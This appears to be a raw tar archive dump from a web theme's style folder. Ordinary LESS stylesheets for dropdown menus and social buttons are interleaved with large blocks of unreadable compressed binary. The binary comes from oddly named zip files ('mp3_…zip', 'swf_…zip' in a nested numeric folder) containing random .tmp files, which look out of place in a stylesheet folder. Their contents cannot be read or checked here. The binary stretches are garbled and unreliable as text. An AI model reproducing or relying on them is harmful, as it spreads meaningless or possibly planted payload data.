�ǵ8��]�����N$�!ڒ� ��{��yK�)g䁱�JJ�f��8���̷A7��D$p<ǧ�m4�a�D�g?PK�rN[��kJ�!c_68edec2326281.tmp]x��X��_�(�
����sz��^���眚��jz��5�Wҕ%�s�?�}����	u��?���W�����~L���Z�5�O����\
5������hT\�^�0�W��!Ls>�Zڥ�����fJ�u�T�������SK�:�,X�*N4U�|o�����؆i��!��Ţf�^���F�K$Rx�I@|9c�
���v�,a!$2��B�6q�h���d�`�w�JrWK��K�r�A���i8l�OmLD�':9`�,�<,�c�Gf4�(L�!��†g��6
��Ψ��#Lrgm���$��$���Ł/܊Ljh{���:��<�T�pم�ףc4��2��zs���D�p�.�%)*���壽�J'5�Qu�=�nܫ�e0ӂ��2���nz2�Y�7F8o+�t��0m*�$x����O@��qY���Yh�`���$��+<y���Du��t�79#8|�
�aؐz�I��
�b/di�J��y�!�����:�&9l	<m&� ��ݴ�V�8�M��V���1�x#9t�ZQ�}���]�����u�S��nq��pwQ��qo�Q�T�B��m-~)$�	��:wfG8�����^�},���fKE`�� �s��0pn
2�����������F���µu��g�n�8+�[Gʮ_u��w�r�
V��krFl�x
^��$�!{��a@&&�S`|��K\E[&��	x����'�&.B~�p��m���[�iW˫a�/ꦶ��P*�6�L�+L$���Z�s�8 f�@׼O|zP�
��_n�Ic��AT�i���!}��ĺ,�p�H���oR���3�%�C�|�.d�#�J���^
dS�Z%e���h�G�CrO�s[�<>kSŖ.���I�jT|XXsUč:�z��c�e�2��~Y2�k!�0yWH�џ�'TDž�p��s�BnrL�G1�^>�םg�E0:��s �p�ccH�=,F���Lsy=�{iL�*T}SJBXy�R�p^�5!���w�ػ�6��mdb�B�)Sc�3����,��:�2H&�&MY�z.A3����5����}�s�VG��:e8���͵th�/�i���M��<}�O�}W�=��]mᮠ�rO�c|C���͛��M�l�F���k� 5��f�E/��}�Ck��'3�i��]��q
������:g���"5,�q2^��dž�H����Ӏ�S���?$v��ۂ9<����V%Ge���\��ݎ�}_��Y�Q� ���|X�������rr]k��3�Z?�V���:y�?J�c=f*K*.���"ֶ�N�J9�[ ݠv�{^xm�5�Tk׹�9=���;��2o��F�z���Gxy�AЫ���f)�P�k����!�\/n5�{�Ǧe�ό}���Fg��%�ժ��=.>YAH~�C�U	A�����(I���*��Ȉ�	��Z.�-�!���(c��x�>y��0z9(��>�P���zn���|�^����L�:�"��b�K���7ƿ���c�Uܬ�����[��+�e�lH��,~��c�+᪰�2cT�LFzM��K]K�&�`�\��/B◑s!<r�O�I�l'7.�%_Y�s��-$�"d�`������N}�N��)I��!4[s����ɰ[��ĵ�B��B趱m�~���ܚz����Z<��-�5e-DB�7�˨�֋ .�����󠛁�W���|��>��+l��gڠ���G5�|`��(��eU���=��t*����m^��^dž��Ƿ�ϕ��@�(��v>�]��J�Y(sY����(�	������'����/
o��U�'�
�ȫY�y�j�1���+k�'���̼���3Hrt�t��M3"$6nE��"O�3:>��wc�@�x�%���H�S�qk���"�N�v��u�+
�G��x�S���J�jn�GÑ/�%�1����߭^`��]b:-�����jc�\�.��(<q_"���S�
����	��JUM-�b`�oTç�&*�[�oI�z�w�Ҳ�_�!O=]'�����2i���s�p�5VS����M�<�j�8Y�">�y�О���8 (�*���$xEhG��.�x+��A�VuJS&�?���e~]`���H�x�C�R�R^�b�T�<�0D�7��& 5O�� �.a�	A����*N�T	�}Hom
7Xmv�V��ר J5I����Z�Ňl�w�A�-/BZV���D�-t��X��H�I�I5�Jw�*f����}��g0�w�R0cN�܇6��2�7�X�4,�.���`��l�;�Q��y*p���/��nO{�j�?RJ	�&���Us
P����+Z��j�@���jO�ܥi�Pƥ☹p��r���%ؼ,v�׵�~��"�*6e�kB���`m�r�����+x'�lP�"��$<I�/R�[�����:�X��Ѥt:+L�^�z/�u�
��Yb��aa���c�,�����cA�[Sm�/�h����#���w�,a���j���	��%'1��~��ܖ�7���@o�u^6n�G��Ƣ\�Ѱ��[(���^�V)B^kX����S�Nj��й���m1�mg�
�L�&Մ)�v!;"��n���*���#�G�5���v��#�p%aY^*��������Ȟ���c���hbe/뭡�ZR" ��(��,�D�A<��"4�@'����,	���g�܃@�
����� 
���z�g������^�(�M�Y��[�ʝ�}N�$k6
�0���{�w����b����ef�	g&8~cpQ;^�vy��KCxyT$�/QeI�#py^r��ˢ5 /�O�DG�@�F�z�Bcg6"I����@��˳�m������"�sVx��!N�I�I� ���D}������E݁�X��Iq�)��	Ysr#0#0:�x�p1]��Vj�5�
MKx�i�B/�2#i�:R����0�'����bH��u�Ǜ@�k�>���Z⵲_��0��z�0�F3�/SP�"���U�[ہ��@����	?ͭ�t�W�I߹�1G��F�Շ�h)�K��'OExY"Z��$��,��r���+�\n�i������h-�8�!����{-��s�Y(-|8�eǕ�>Z-��S^�M���u�@yU%�*2�Xfk�"���H4�)���Esa}fp�^Y�o7<1�<hFs/��S��J����pr��z��ܳ-�A+��Z=���`�����'}�����LC��Ψ*X���/�۹"���r�ĺxL
n3�{�z�� n>��k�8�5��n�7����BWR������Ev�.�i;id�	O�����qA�j-V�|3^b���iYEg#ZAoE9 ���vxRcݸ��#.�6�0T�?RY�.*f�h?
3-.3���Cx]����w��!����ô% 1ʹai�m�t�<����ADO�az+	��6i�;b^��@B��I�ORRj�-QO[r��sDp�W�xk1HńH�FdP���E�1d����g�_�9��*���Qt'	���{�D,ĝ�T�,�o���-D���8��]i�8|H$�^P�s�ݬ��=�e�D7 �7�h�"J��$h4�wڪ�FL��0��3���?���hy'���X��q�䡜ì|<��#�|{����Rz'3�cMJ�
��о0ƿ��>�����f�����a�Tpx1��o����s��L:hL�v���n֨��Ċ����px���t����>��ou��$����}���Խ�q=�Lpa�ĖW�_���~����9���̰"���ImX���,�}Mi�!��	@_�VrC�I%�C�O�E�;G�j�=���P������I�D"�N�DZ��?;|���n�<\�0Z���/=jk��4V��h�L[�,�7%b�
6c}���?��o�g���Y�o���oT����w%�~���/���/�_��w��?��/�/��ϟ���x}��{�n�o������L����}�Y������?E�_6��Y�m_Ɵ�T���%]�i��_������Cp��8��叟�Vnق�?^L���?���W��4��u�_�v�G`�\�>tn�w��������y����!Q�ā�r��#�/��Em�"gz9
02�{�Y�>��*>������]�X�W��e�<��z�u*�&��:]�>m�4�O��/
������ϟ�_�PK?�rN[�MM�r��b_68edec2326281.tmpPK?�rN[��kJ�!���c_68edec2326281.tmpPK��less/less/mp3_68ede57e50841.zip000064400000012703152434265230011632 0ustar00PK�nN[���B�b_68ede57e50841.tmp�Ums�:�+�����/:�Zݮ��v�a
�Z)`���=�e���Lb��s����N���:�D\�r6�嚨D��Xk����#q�o��gj{4DE�3A�D#q.(�����	)L��4rIVE�X_M4�x~�O�0�w����.�|�F8t�?f�:���\4ME�_�je�ne��g�&��X��#50�.��Fu�X�U��.s��x�a�L��A,+���3I`�S�f/���D�����_hEc;x^����ɷVw�Z�8ԣq���7� h���Cÿ\�g�7��ö�Y�Q�B�DQl�sy߉�kE/����k�{���./�>�m�c_���T��r�t�ܾ|��`��`�v��	�\>��ɖ�����<#�hG���2�Q���A�f9�cbD!cŰ�P`�	�̹��~+v�^|��[�m����^ig�T}޻���ل��ܟǹ#�C��h�@���Q�v4�>OG����j<:���vFu$�B���n��r�t�;>q�ɞL��(�U��u�����G��T�U�`?T̈́��lVI2�l�F�Ѥd�}b%���f��!���3l"�4C���S��J$-�I�FTK<�W����3\Ԓy�Em�4G�E$9��͔�KV�]S
M��^����5DJ��,�q*�TK$��5�.�T�i�Z�Z:��'�AJ'�
���cr�ؗ�{�λ�����et��g?-�n]zGG�Rr���29�uZ����DCE�jx;��w�Jh�������Lq���UO3��v�>
�厵�J��Zo[Gq��,�iL�p��' �D2:8@�VR���N��Ag:e��W�D�Q��Y���#I@���)��P`٠O��R׳%ϑ=�`���
נ�T���Q\��o���(̏&�wdɪn4�C���S�K�K,TU7�ݹ-�����5���OPK�nN[׳�l�c_68ede57e50841.tmp]x���8r�|h40�P�	���r�z������4���g"D�U$OU����s=���ǟ�?�nXL�����I		��ܒ�C���;-�B
��5�yboy�σ57�J�A=�y�G\K���B�M�^jf�i"1&��?����1&Ǩ�(U�a����rwM���fr���>@�^	,;�����\lDC�
c=�	N�����H�@�E��I���!�$qW��E�z�Z��z�7���2@�������NA�-BS
�fᖲ
��	�*���B)Ĕ�M�7i�"_�A�����<ݹ�`B���h ��P^;3;��9�S#1�_�s)m=t(���69����d�t�cZ�GޒP�&���zZ$��x�.&&1,JǺQ6�2�v�9*��%�`��S���x��v�a�����MU/���+:���#m���(@��}��L�ݽ��qTI��
�S�	x!:����dyW� a��8 ��C�9ܧIAw`��^�|�?[̥�7X%w��<J�[�46v)>�\���
J'��S�%F2(�}];�b
բ����6�c�rC�D�d0<<F1�)9��p��|�ǝA��^:�*c��h;�LZ�W�^���y��͢a~ĥnm��0�]��<;��m�R���%< K���d�M����@�������_|���F�����UxV_ɫT��Ln�|%�-b�ٔ�gH�7
���	���]�f�Z�!ťְB�EW���~��i�I��u�ٗ�n�1�$�H�����>;,�Vy�02�|�m�f�>m��e�*o~�x�����H���Z��p
7��H�H=�En��3�8a�^�@i��ε7/]�3��3-EI^�΢���y�V�֥��Ga����4\?���Z�
��;��b�m��aj��_b�$�b�0���Dq4��,�dh�PY	�=!�=�M�I�(��Z
�&�Ơ���*#9����g��<��˹4&l��s�EX[�R�xOW����]ݔ{S��(�(ګ�7uÑ��w����S��|V���2~m�)��a<�Ez�$5`�X�H&Cے��/L���fY1L+y�b�fr��R��T�g�g�)�w��}�4!mT�9��j0�*a�����'v|��u���� yy/|T�[�ݎ5��%3ym�-I��#]�U�h�=猗Z�[ku��ۦ1)�x.Û,O'/���le9?�A&Y�|>s�
%�y2ikK{�Q�T%��=�۴��~k:Tx�ҋ�G�߇���o�>���D��G$�����e
�����욀*�mCş<n���o���J�4�+(d�"���^JPȣ�0�1���
.V�N���2֔"���&7�oC��Tn4���.��-��T\x����ӛ�3fB�^>j�?�D}�8BE����F����ժP`�˄){#�Q��z�
��ぢW�l�$�t2��{�Q(
Wϖ�&�p�-�V���%$J#i4�&ʸ��2	�*g�ծ!Zpp�z��t�A�q�o>��h�d�D���H&pw��N�S�X6���RK�ܥ��t��V�Z��&��I��}���)��lu���h:M\��΀?����H@�;�(m��~1�x�"��ގ���KN�Z:�s{D�	N�ѝ@Tk���3y]M�rrͥ�~Ug;u!�C~ދ��Y��F��Ƹ�Q�t\�k\��8ܽOm�{q
��&�,�s���*V`�d #d�gت��<	��8]�
���SD���	̿�sخ:�i�#�:T��
����m����X^{��!L�ȅ����3,�I$ڶ
�a�Se?��s��Ok2r�d.�e����jg���>Fȏr�^����f���Gh(�9�
��	JZ�zI$��k�1�ۚ0�3�Vـפi\�0\�Nq�U�x&G��zq�ܾ�܈G�y+�jS"I�1�vlj9�^?1=r��o�H����k��C�v'm���.��-I��� �6�PC
�-��||�]�_h���ѧ��3�Z�K�\�0�0��$o4����y�)�:��O�~�������
�
��r��n�9}�g%"j�d��,�jAN�P8�L*V)�pUC'Q~L-�G���u�M�k#���^3�����v	~��/ɑ`�̮���k"�s�D;!e����-̥c�"�E{l���lV\�T#���U�0>��W�f[-��_�J�N�e��j컧|�K�&M2| �<���8�a������$�7�9T�|��&���\�c�񞧏�-�"��@g[�0����aS�|�yg6�`,^���ĊwJ�c�b
0d���Ӝ���E�|[X��$u�����^�TKv��WҎ=9��Gd�՛�5�,]3�ŗ�@����j�Y	�<8yaN||LH\Pap�g���M�vRI�,���8-�Lx2���oR�@����f�*h��7�)�yzl�B#g7<��j=�y��� d3�*�����ćք[�d_�����W�w��l
���;f���
�zP�=�pO{]2��N����^`L��|�`�mi����_����c���P�[U\�>�a
&�YB&�P
����מ%��|��-V��19��"0�G�# �Cm}Z8j��S�3����g#;�Uq�b��@j�J~��K�˙p���[�t[U��,�VW��P�O�K
�L�p+I*�Y�vO��~Cq0�p$o]~����g,0��8�k@�V�@�FO��/��҄Dy��
W���h��)
�s�}�)	��nL���[i����b�i_`���C�DU��V�Lc�d�l�
��u󥁶�5��<�*�p����ޜ�|��Г��{�덡��Q���~����q���v����%��
��I ���'PlA��J+@��o-_ݶ�ta6��3��"Kώz�-�m��dT�I`ΰ>o��N:�[�8C��m��Wo%��4��'�m��L$I��91�Sk�t�܌VϰlP/�D߬�ZT~$�*�6ߕ��:%���0/���MF���oz��ᬇ�t���$�%�[o��{�}(j���ț�=x��iFfX��3q2}~��2������D�|#��㐬F�RHka�N��8��F����[n]�Z��۸ã	_r�z�A�@����0ŋ�?���*(�uX"�:�j����牙`_.��˼;@D�Y��S8�fluM6yÉ�o0�	�W�m�u��ǜ`�
y��	�o �1��������2X�SX�)�>±ޫXk����2�k��;��국o�0f|jB$�-oK�4n� ܇�� ��x�"Ŧ��D�L��w{�e�@�q�yO�GJL䶏�;�B�G�rj��j��'0�}�sŃ�}�n����X�r`?'I]Rg�Qp�Ą����*{E}�SW~1��Yaǔ��F��� y��l\'��%]�aF�z�|��dF9\�mѐ����ױ�<�bB�� ��J̻���l�����)�0�P�z��P�Xk?sq�5��`ɕ��Q���‡NȜ�Z�w�nFl�x/y@���J�E�/3F��B�[R2�D-p!�7)[�d�C�����O��=5]�&��4���g�_׹_hk6�$�֝�N��3*���&(���Q`B�hO�.[�CO�H��k�Ƃb�U�s�]���P3�`�|!K�溑>�L]҆�Zmr�!v��#y��IbI̻Xk��'e$�1\g����`2	���J:�ce�	'&D6}�����h΁��<�J�r�D�F�=�x��D��q럘o���΀<�Z�5��ٿ�qds��Hg���z+��-�1��XFh4�e���R�Ľ^ǁ�����=pO�KD�}w[3V����Ou�hnY��h���{�A�p�8[Fn�F�ɰcگ���(�N����>�W�\�aܻzV?JQNn׋m�jT(�X�OX�����x�Ĕ�U+،E�^�ǘ��4���=�o��N�0����_7���㗿�(��G�va��`����������_�_��?��
�|�lG���o�����L�����ۗ�[A`��.�e�?k��3��W��v������?~~a����7��~����Z�`z��w����3>��?������������ݧ΍�a?�w����"������`�T?7��m��)�Kj�Y`+� ٜ�H{��ڇ^Η�n|Fw�C���W��i�8��z�m.�&��:]�-�z���ӽ��ۂ�q���ן��
PK?�nN[���B���b_68ede57e50841.tmpPK?�nN[׳�l���c_68ede57e50841.tmpPK�+less/dropdown.less000066400000015322152434265230010251 0ustar00/*
 * Component: Dropdown menus
 * -------------------------
 */

/*Dropdowns in general*/
.dropdown-menu {
  box-shadow: none;
  border-color: #eee;
  > li > a {
    color: #777;
  }
  > li > a > .glyphicon,
  > li > a > .fa,
  > li > a > .ion {
    margin-right: 10px;
  }
  > li > a:hover {
    background-color: lighten(@gray, 5%);
    color: #333;
  }
  > .divider {
    background-color: #eee;
  }
}

//Navbar custom dropdown menu
.navbar-nav > .notifications-menu,
.navbar-nav > .messages-menu,
.navbar-nav > .tasks-menu {
  //fix width and padding
  > .dropdown-menu {
    > li {
      position: relative;
    }
    width: 280px;
    //Remove padding and margins
    padding: 0 0 0 0;
    margin: 0;
    top: 100%;
  }
  //Define header class
  > .dropdown-menu > li.header {
    .border-radius(4px; 4px; 0; 0);
    background-color: #ffffff;
    padding: 7px 10px;
    border-bottom: 1px solid #f4f4f4;
    color: #444444;
    font-size: 14px;
  }

  //Define footer class
  > .dropdown-menu > li.footer > a {
    .border-radius(0; 0; 4px; 4px);
    font-size: 12px;
    background-color: #fff;
    padding: 7px 10px;
    border-bottom: 1px solid #eeeeee;
    color: #444 !important;
    @media (max-width: @screen-sm-max) {
      background: #fff !important;
      color: #444 !important;
    }
    text-align: center;
    //Hover state
    &:hover {
      text-decoration: none;
      font-weight: normal;
    }
  }

  //Clear inner menu padding and margins
  > .dropdown-menu > li .menu {
    max-height: 200px;
    margin: 0;
    padding: 0;
    list-style: none;
    overflow-x: hidden;
    > li > a {
      display: block;
      white-space: nowrap; /* Prevent text from breaking */
      border-bottom: 1px solid #f4f4f4;
      // Hove state
      &:hover {
        background: #f4f4f4;
        text-decoration: none;
      }
    }
  }
}

//Notifications menu
.navbar-nav > .notifications-menu {
  > .dropdown-menu > li .menu {
    // Links inside the menu
    > li > a {
      color: #444444;
      overflow: hidden;
      text-overflow: ellipsis;
      padding: 10px;
      // Icons inside the menu
      > .glyphicon,
      > .fa,
      > .ion {
        width: 20px;
      }
    }

  }
}

//Messages menu
.navbar-nav > .messages-menu {
  //Inner menu
  > .dropdown-menu > li .menu {
    // Messages menu item
    > li > a {
      margin: 0;
      //line-height: 20px;
      padding: 10px 10px;
      // User image
      > div > img {
        margin: auto 10px auto auto;
        width: 40px;
        height: 40px;
      }
      // Message heading
      > h4 {
        padding: 0;
        margin: 0 0 0 45px;
        color: #444444;
        font-size: 15px;
        position: relative;
        // Small for message time display
        > small {
          color: #999999;
          font-size: 10px;
          position: absolute;
          top: 0;
          right: 0;
        }
      }

      > p {
        margin: 0 0 0 45px;
        font-size: 12px;
        color: #888888;
      }

      .clearfix();

    }

  }
}

//Tasks menu
.navbar-nav > .tasks-menu {
  > .dropdown-menu > li .menu {
    > li > a {
      padding: 10px;

      > h3 {
        font-size: 14px;
        padding: 0;
        margin: 0 0 10px 0;
        color: #666666;
      }

      > .progress {
        padding: 0;
        margin: 0;
      }
    }
  }
}

//User menu
.navbar-nav > .user-menu {
  > .dropdown-menu {
    .border-top-radius(0);
    padding: 1px 0 0 0;
    border-top-width: 0;
    width: 280px;

    &,
    > .user-body {
      .border-bottom-radius(4px);
    }
    // Header menu
    > li.user-header {
      height: 175px;
      padding: 10px;
      text-align: center;
      // User image
      > img {
        z-index: 5;
        height: 90px;
        width: 90px;
        border: 3px solid;
        border-color: transparent;
        border-color: rgba(255, 255, 255, 0.2);
      }
      > p {
        z-index: 5;
        color: #fff;
        color: rgba(255, 255, 255, 0.8);
        font-size: 17px;
        //text-shadow: 2px 2px 3px #333333;
        margin-top: 10px;
        > small {
          display: block;
          font-size: 12px;
        }
      }
    }

    // Menu Body
    > .user-body {
      padding: 15px;
      border-bottom: 1px solid #f4f4f4;
      border-top: 1px solid #dddddd;
      .clearfix();
      a {
        color: #444 !important;
        @media (max-width: @screen-sm-max) {
          background: #fff !important;
          color: #444 !important;
        }
      }
    }

    // Menu Footer
    > .user-footer {
      background-color: #f9f9f9;
      padding: 10px;
      .clearfix();
      .btn-default {
        color: #666666;
        &:hover {
          @media (max-width: @screen-sm-max) {
            background-color: #f9f9f9;
          }
        }
      }
    }
  }
  .user-image {
    float: left;
    width: 25px;
    height: 25px;
    border-radius: 50%;
    margin-right: 10px;
    margin-top: -2px;
    @media (max-width: @screen-xs-max) {
      float: none;
      margin-right: 0;
      margin-top: -8px;
      line-height: 10px;
    }
  }
}

/* Add fade animation to dropdown menus by appending
 the class .animated-dropdown-menu to the .dropdown-menu ul (or ol)*/
.open:not(.dropup) > .animated-dropdown-menu {
  backface-visibility: visible !important;
  .animation(flipInX .7s both);

}

@keyframes flipInX {
  0% {
    transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    transition-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    transition-timing-function: ease-in;
  }

  60% {
    transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    opacity: 1;
  }

  80% {
    transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
  }

  100% {
    transform: perspective(400px);
  }
}

@-webkit-keyframes flipInX {
  0% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
    -webkit-transition-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
    -webkit-transition-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
  }

  100% {
    -webkit-transform: perspective(400px);
  }
}

/* Fix dropdown menu in navbars */
.navbar-custom-menu > .navbar-nav {
  > li {
    position: relative;
    > .dropdown-menu {
      position: absolute;
      right: 0;
      left: auto;
    }
  }
}

@media (max-width: @screen-sm-max) {
  .navbar-custom-menu > .navbar-nav {
    float: right;
    > li {
      position: static;
      > .dropdown-menu {
        position: absolute;
        right: 5%;
        left: auto;
        border: 1px solid #ddd;
        background: #fff;
      }
    }
  }
}
less/555262/555262/swf_68ede7a7eeaf5.zip000064400000012673152434265230012614 0ustar00PKipN[	���b_68ede7a7eeaf5.tmp�Uks�H�+]����ui^�.�5�D7*�Y��D�"fS�o�ۀ@vv>�U�v��9�6}���`����2uƂ��x�A�6���Ђ
�`j�A�U>S���7���UI*�D!߉|7
�J%?��U�7m�,�3+�����G@X����f��ɲF���B�iB�z.�{D����i�k)�4����m�%l��(�n
���s��>�x)��e�u��L
@�����{���ț�bs�']I�y���Z��
���a|�4<��ϕ�8n�Wr����һ��@��w7������M�/(���s�����ȸ{��V����o�%�>Qe1�^��[x��Y{�ӛ���va���w��%�j3�Д`��1��S��MH,g���ϊP���'��:�r��{����ܭ��$��Z��0�e��B�B�h�F�_����:zc+#}
�!�����d�T��n���]��y��ִ�T�x�8������[c6�����'�0���G��1$y'Nɗˉ�u��5�Nn�:�����.�ܘM2Yv�$�{�@�D�3n�Y�YJ$rI��Yh&�D+�N�X
�
�j����B�!(�:�M�jI�S?!����q��P��v��%��R�(��T�X��U���Һd���TM-$YM��K�+W�,�J�#'8j3��T��R%�-5�9���ZF-�Qf��(�<��.�h�A�K:���ӹ��z�Y�g�����V+m,�|�z�3��`q�Yc�u�
Z����۩1�w��1���U��p���3O]��T�Z�@�&�ML�ej(w��<�A�/���e8�i��4�H�qf��~ӝ�(-xp���3oB���5a9u�!˟��5$9Z�ȫ
�4b"���˶�������8��~4�I��hZ�Ԋ�R��9�h��@2i#��=��!yZ��M��i�'PKipN[;W�$�c_68ede7a7eeaf5.tmp]xy�H��W�Q4T���ofP���W���Ѹ/�}�f��X==�<A����<�D������/\���Ͽ���^�v��^���"�C˾��Ag���K��V��V߁;��
���ª��;��N�qJ{\������XOy2q(2��ן����bf�.(
WLA�h���l��Ԕ���;�=Lj�(gl���� ���8���w{��w��J
(^����+)}���%�C��`ž	j ɞ�ꗍ���QhLKc�t�\r�bO�� \Ps
�v��f�S*������F
X�w�X���)s��4��׎0KT�9YV�=
�k���̷a���QcZ��Y�btE�!����k��N#�ď��S�*	�a37����u	��v�G,�M�Ģ>4�	p �u��n����'p�2?���kJ��#R���I\s� ���s�[m+���>�7�0�(@lN)��sȄ�>N�kV(
n�ߓ0���e�1���"�(_�w(9߶�0�e��n��������b��)i���4@�N$t(�mUټlv�$3�I	�ԩ��ǁ\PMa��n=����
9�{�-�l�h��ӳ:Ta,~uŧA�ߥ���]]>"w�e&�{�pqT����o/��bǏ���r�m�TPX]�#���xe�)�)���f#��[����O�Ϥ�F���j�Y,�v!:��T��`���u~S`�wR
��R���ȓs?�Y��<䷹�+�m�ϜA�f� ]�q��H��x�j`��H��[�u�Y�)�ԝUՍt���&m*i�:k�(��{x�q��%��8��:M��U�E�\�1����}���W�]��*Zu����JM$��q�	���F�|3���8n�\���ؗq/�XC��
脟��cS�<�L��W���f�b��/�R^��9j�?\^Md��{�S/��7������)��[!�^�V�m���;U��/��g;��_J�sC�fS98q�T�Q��e�0K'�l�3���6!ᑷ~��X��~/�
7P	�U�m��Fs��
��۩�I4����v��ǯ��ھ�_�K������FI��YA�N�0Y�=�!)�ߩsV�<�J��dXd|�%u-���Y�*\��i����n'�.����n}�J����RUz
�Yٲ�Y�R��p�+/J����Ew���_!���Q�CZc95
���eTN"�+�-�8Њ�Y��=d0z[�ARg&̞#�!�W���mTd'�'�ˌ�޻�Z�&�W�^�{�c?ߦ+[5���vJ�(y�mL�Z��������P�b�)���/�k�9�>�e��e�P�֙�h>�F�mJ�����M��Υ1�����!�2w܌�NjV'H_�͛��*����b�^/3'H�lָ��y��}�vwBC��gq���{�ϑ�6|AƤF�?��A�c8)�G��Yu)��KQ�#̮���ሳ�����-Ԋ퉨��7��֝M�0j�N���_�2TI��u�=@���ؓʙ�6�d{H5D2�����jxlo���9eƔ�j�q����K3�R'��2��;wwܜ�ѨÖ��A��>՛�$��滒���9����b����^� xk�/���Cmv͚�sk�_�����)�a�ʤU98�~5�\�K:1��k���������'	�akl��ӗ���d��{ȄxW�&��6�1���<7C�1T4�@e�3ғ��ըTq_$�pj�VN�Zr��+��f��&
�y����In�I[�����&��
K�pM4�Gh9����kK�@[����+L���y�/���8N2��0�6�ge1wonn��R��&�`P�Y��:�-^��0����HD�`G���`n����wך�',�"�ϵ���%j�"Q%H����)�moiN�t3gv��@��I���u'�#�T3��L���Ѽ�����wC4ChI��a�+�
WC�?�C��s�b�a���#f3#��a��V��e���|/�c��IZ8��E�ń��&�o�#!��E�cQ{B=���6[$���Ƭy�R��֝�L[g���N���ȱ�|�W
F��[n;�|#���m?8|��]f�0�+mSeQ<��@ȇ�)���ާy�T�l?o
G/K�.mӐ�+�,��@��?��1wrz��͡UXV��m٩����t�޿��rEV�-֩�;7�����N`۳ZՖ�&C4]��ػ�`3�L��r�V�	1슈(k��#�x��"�.�5�7�ʵ�~/F��"��ɟ	�s@%��ˆ���kreL�ath�J~}�U㋐M���"��H�6SضDWJ�C
���`�A���^O�H��a�}]W�����|�=\e��"��Z���E���|i��z�4����x�{'kI�_�S��J�XJZ�l�yjךX�Q�s@c�X��[��6��L v�ƈbFc�2ܵ�dT��{��a��E�)��ĭ����	q���܏Ep˭��f�uTI���O�7b��%݀�KM���m=W��v��V�LE3.UQà���ͥB_1k�i0����e�$\^�9@����_�֒m�8S�G���:'K�;��.�E�
�
}fȰ�}��e�&3���>ǭ�|<��wBq���/�̖4%OA/]����˛@�w����j0)
��G��X��ď�A#R�Лn�q�����^i�޸A���2sp/p)(r����
�=r��R�3_iu�
���LJ_k��wƱu�;DW��Ž.λXKS'�ia-8�Mh�ܕ4o�3z��!m1@+GD�(͢;�}��I�q�6'�Ȥb��6��7Q7zS
��g�[�Omt~�|s����֮�Y����R��W���_FgWB/?�`7?G��HDZ�VJ��2nɰ6!�r��2bͧ�L;��ad'��W�lqD<�,��To�4���w,�'Yk��x}IP��I�.�L�ʺ�:a�Wנ�������f�F�)O��<S�;�����ذˆPE#���a����@`��P���Z2E<"QF�AUOo.}2E��ѭL�_L�
��x�<IH�h��7�Y&Q��I�2�'>�?� ̜�_>�鈿�W��
X���B�x|`��CIqrq(�N�Ex�e��*;bѐ�3V&QЇ����ՑLD�$yŹ�c�X
2����ˢIJu�نe׎���e�[<�@�4j�W����Iqss%��J�S�j��qV~w��J#­���]^@��?�����>U�
(�^I��X"ֵ3���H�U!Q�B�@i{����ܻ���6S�g�����~]����N��=	m�5ak��b���Q*�w�?�z���;�sh�p}II��I��(&�zA�>e�@%񚣌�^�w,6���j��n��,�Kjі1��De��Ȍ<l$�}��;G����֠�!�_}���_���1J- .��(�C.��Ι5�g�cK�Ld��	߅K�j���OD��~|��i��F��ۚ�߬��B�#�-eƉ�+�,D����V140I@MϷF�{�A]/2Bt޳B�s7�
��@��e���ҹ��Uõ�+Pb�Q.�fϳg'�;�bA1�t~� 3:�HG�Ad$��~����ƒ3��\�N���6�
�Fv)1?�>�J��{s�.!M�m�ߟc˓�
/���whS�aԡ�E)?����ui��Y���!a�ߕ����� OCjW@{3��F��C�U�&8?�W��|&�ʩ��1#�}1�� !j砃nv1��
.}CR�Y'�j�����gEh��&oT���>�Qt�(�}&D�ޚ�O�z��)/R�ɐA���:|���ڜ�~����ms��o֌k!�#�>��x
n����fFe]���3�K����\DI�0����U��-��e���:�x�X-��F��t���������9�����M�_����`��ۉ#;1�o0?/��o��_����/��?I�H[�I˖,�c�1����L���~��O�I����,O�,��z���u���a̟���st���N����w�
���X�?~�ǰi��jw���_̛��_<��.~~����jV�f̅�]�i�n�`~�����i5��ڑ��Ït^G�c4ڱ���kH�T�i��k��e'@�5dOB��|�QkZ�'O�^�\6��j��e��:n�*����ky�}��k���:����?��PK?ipN[	�����b_68ede7a7eeaf5.tmpPK?ipN[;W�$���c_68ede7a7eeaf5.tmpPK�#less/bootstrap-social.less000066400000005741152434265230011706 0ustar00/*
 * Social Buttons for Bootstrap
 *
 * Copyright 2013-2015 Panayiotis Lipiridis
 * Licensed under the MIT License
 *
 * https://github.com/lipis/bootstrap-social
 */

@bs-height-base: (@line-height-computed + @padding-base-vertical * 2);
@bs-height-lg: (floor(@font-size-large * @line-height-base) + @padding-large-vertical * 2);
@bs-height-sm: (floor(@font-size-small * 1.5) + @padding-small-vertical * 2);
@bs-height-xs: (floor(@font-size-small * 1.2) + @padding-small-vertical + 1);

.btn-social {
  position: relative;
  padding-left: (@bs-height-base + @padding-base-horizontal);
  text-align: left;
  white-space: nowrap;
  overflow: hidden;
  text-overflow: ellipsis;
  > :first-child {
    position: absolute;
    left: 0;
    top: 0;
    bottom: 0;
    width: @bs-height-base;
    line-height: (@bs-height-base + 2);
    font-size: 1.6em;
    text-align: center;
    border-right: 1px solid rgba(0, 0, 0, 0.2);
  }
  &.btn-lg {
    padding-left: (@bs-height-lg + @padding-large-horizontal);
    > :first-child {
      line-height: @bs-height-lg;
      width: @bs-height-lg;
      font-size: 1.8em;
    }
  }
  &.btn-sm {
    padding-left: (@bs-height-sm + @padding-small-horizontal);
    > :first-child {
      line-height: @bs-height-sm;
      width: @bs-height-sm;
      font-size: 1.4em;
    }
  }
  &.btn-xs {
    padding-left: (@bs-height-xs + @padding-small-horizontal);
    > :first-child {
      line-height: @bs-height-xs;
      width: @bs-height-xs;
      font-size: 1.2em;
    }
  }
}

.btn-social-icon {
  .btn-social;
  height: (@bs-height-base + 2);
  width: (@bs-height-base + 2);
  padding: 0;
  > :first-child {
    border: none;
    text-align: center;
    width: 100%;
